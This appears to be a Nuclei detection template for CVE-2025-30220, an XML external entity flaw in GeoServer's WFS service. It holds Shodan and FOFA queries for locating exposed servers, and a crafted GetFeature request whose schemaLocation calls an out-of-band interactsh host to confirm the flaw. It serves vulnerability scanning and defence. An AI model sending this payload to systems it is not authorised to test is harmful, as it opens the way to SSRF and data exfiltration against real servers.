复制
id: CVE-2025-30220
info:
name: GeoServer WFS - XXE Processing Vulnerability
author: iamnoooob,pdresearch,darses
severity: critical
description: |
GeoServer Web Feature Service (WFS) is vulnerable to an XML External Entity (XXE) processing attack due to improper handling of XML input. This vulnerability allows attackers to perform Out-of-Band (OOB) data exfiltration and Server-Side Request Forgery (SSRF) by exploiting the GeoTools library.
reference:
- https://github.com/geoserver/geoserver/security/advisories/GHSA-jj54-8f66-c5pc
- https://docs.geoserver.org/latest/en/user/production/config.html#production-config-external-entities
- https://github.com/geonetwork/core-geonetwork/pull/8757
- https://github.com/geonetwork/core-geonetwork/pull/8803
- https://github.com/geonetwork/core-geonetwork/pull/8812
- https://geoserver.org/vulnerability/2025/06/10/cve-disclosure.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:L
cvss-score: 9.9
cve-id: CVE-2025-30220
cwe-id: CWE-611
epss-score: 0.04607
epss-percentile: 0.88838
metadata:
verified: true
max-request: 8
vendor: osgeo
product: geoserver
shodan-query:
- title:"geoserver"
- 'http.html_hash:1093634893 "Content-Disposition: inline"'
- http.favicon.hash:97540678
- html:"/geoserver/"
fofa-query:
- title="geoserver"
- app="geoserver"
- icon_hash="97540678"
- body="/geoserver/"
tags: cve,cve2025,geoserver,xxe,oast,oob,ssrf,unauth,vkev
flow: http(1) && http(2)
http:
- method: GET
path:
- "{{BaseURL}}/geoserver/wfs?service=WFS&request=GetCapabilities"
- "{{BaseURL}}/geoserver/ows?service=WFS&request=GetCapabilities"
- "{{BaseURL}}/wfs?service=WFS&request=GetCapabilities"
- "{{BaseURL}}/ows?service=WFS&request=GetCapabilities"
stop-at-first-match: true
matchers:
- type: dsl
internal: true
dsl:
- 'contains(body, "wfs:WFS_Capabilities")'
- 'contains(content_type, "application/xml")'
- "status_code == 200"
condition: and
extractors:
- type: xpath
name: featuretype
internal: true
xpath:
- /wfs:WFS_Capabilities/FeatureTypeList/FeatureType[1]/Name
- method: POST
path:
- "{{BaseURL}}/geoserver/wfs?service=WFS"
- "{{BaseURL}}/geoserver/ows?service=WFS"
- "{{BaseURL}}/wfs?service=WFS"
- "{{BaseURL}}/ows?service=WFS"
stop-at-first-match: true
headers:
Content-Type: "application/xml;charset=UTF-8"
body: |
<wfs:GetFeature service="WFS" version="1.0.0"
xmlns:wfs="http://www.opengis.net/wfs"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://a http://{{interactsh-url}}/xxe.xsd">
<wfs:Query typeName="§featuretype§"/>
</wfs:GetFeature>
matchers:
- type: dsl
dsl:
- 'contains(interactsh_protocol, "dns")'
- 'contains(body, "java.lang.NullPointerException")'
- "status_code == 200"
condition: and
# digest: 4b0a00483046022100f73cec8df8a613b4f126fc3220430abe2d3e316ac67e2626c550e50929f4bfba022100dd6a2c5fed15006e99380231ea0b18b2095b1b80a0ff394dc8cee4eac64e9c23:922c64590222798bb761d5b6d8e72950